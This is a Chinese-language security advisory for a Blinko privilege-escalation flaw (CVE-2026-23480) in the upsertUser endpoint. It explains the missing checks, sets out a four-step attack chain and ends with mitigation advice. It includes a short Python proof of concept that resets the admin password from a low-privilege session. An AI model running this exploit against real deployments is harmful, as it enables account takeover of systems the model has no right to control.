CVE-2026-23480 CVSS 8.8 高危

CVE-2026-23480 Blinko权限提升漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23480

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blinko

漏洞概述

Blinko是一款AI驱动的卡片笔记项目。在1.8.4版本之前，存在一个严重的权限提升漏洞。该漏洞源于upsertUser端点设计缺陷，包括缺少超级管理员认证中间件、未强制校验原始密码以及缺乏用户ID所有权验证。攻击者利用此漏洞，仅需普通用户权限即可修改任意用户密码，直接提升权限至超级管理员，从而导致账户被完全接管，系统面临极高安全风险。

技术细节

该漏洞的核心在于Blinko的`upsertUser`接口存在多重逻辑缺陷。首先，该端点未调用`superAdminAuthMiddleware`进行严格鉴权，导致任何已登录的低权限用户均可直接访问本应仅限管理员使用的功能。其次，在修改密码的业务逻辑中，`originalPassword`参数被设计为可选项，若攻击者在请求中不提供该参数，系统将直接跳过对旧密码的验证步骤。最关键的是，代码后端缺乏对`input.id === ctx.id`的严格校验，即未验证当前操作者是否为待修改账户的所有者。结合以上三点，攻击者只需构造特定的HTTP请求包，将目标用户的ID（如管理员ID）和任意新密码填入参数，即可在不提供旧密码的情况下，将任意账户的密码重置为攻击者指定的值，从而实现权限提升和账户接管。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者注册或通过其他方式获取一个普通用户账户的凭证，获取有效的会话Token。

STEP 2

步骤2：构造恶意请求

攻击者利用upsertUser接口缺陷，构造包含目标管理员ID（如id=1）和新密码的POST请求，故意不提供originalPassword参数。

STEP 3

步骤3：发送攻击请求

使用低权限账户的Session发送该请求，服务器因缺少多重校验而接受请求并修改目标账户密码。

STEP 4

步骤4：接管管理员账户

攻击者使用新设置的管理员密码登录系统，获得超级管理员权限，完全控制应用数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://target-domain.com/api/upsertUser"

# Attacker's session cookie (low privilege user)
cookies = {
    "token": "attacker_low_privilege_token"
}

# Payload to escalate privileges or reset admin password
# ID 1 is typically the admin, originalPassword is omitted to bypass check
payload = {
    "id": 1,
    "password": "new_admin_password"
}

response = requests.post(target_url, json=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Privilege escalation successful! Admin password changed.")
else:
    print("[-] Exploit failed.")

影响范围

Blinko < 1.8.4

防御指南

临时缓解措施

建议立即升级至Blinko 1.8.4或更高版本以修复此漏洞。如果无法立即升级，应限制对upsertUser端点的网络访问，或配置Web应用防火墙（WAF）规则以拦截针对该端点的异常请求参数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表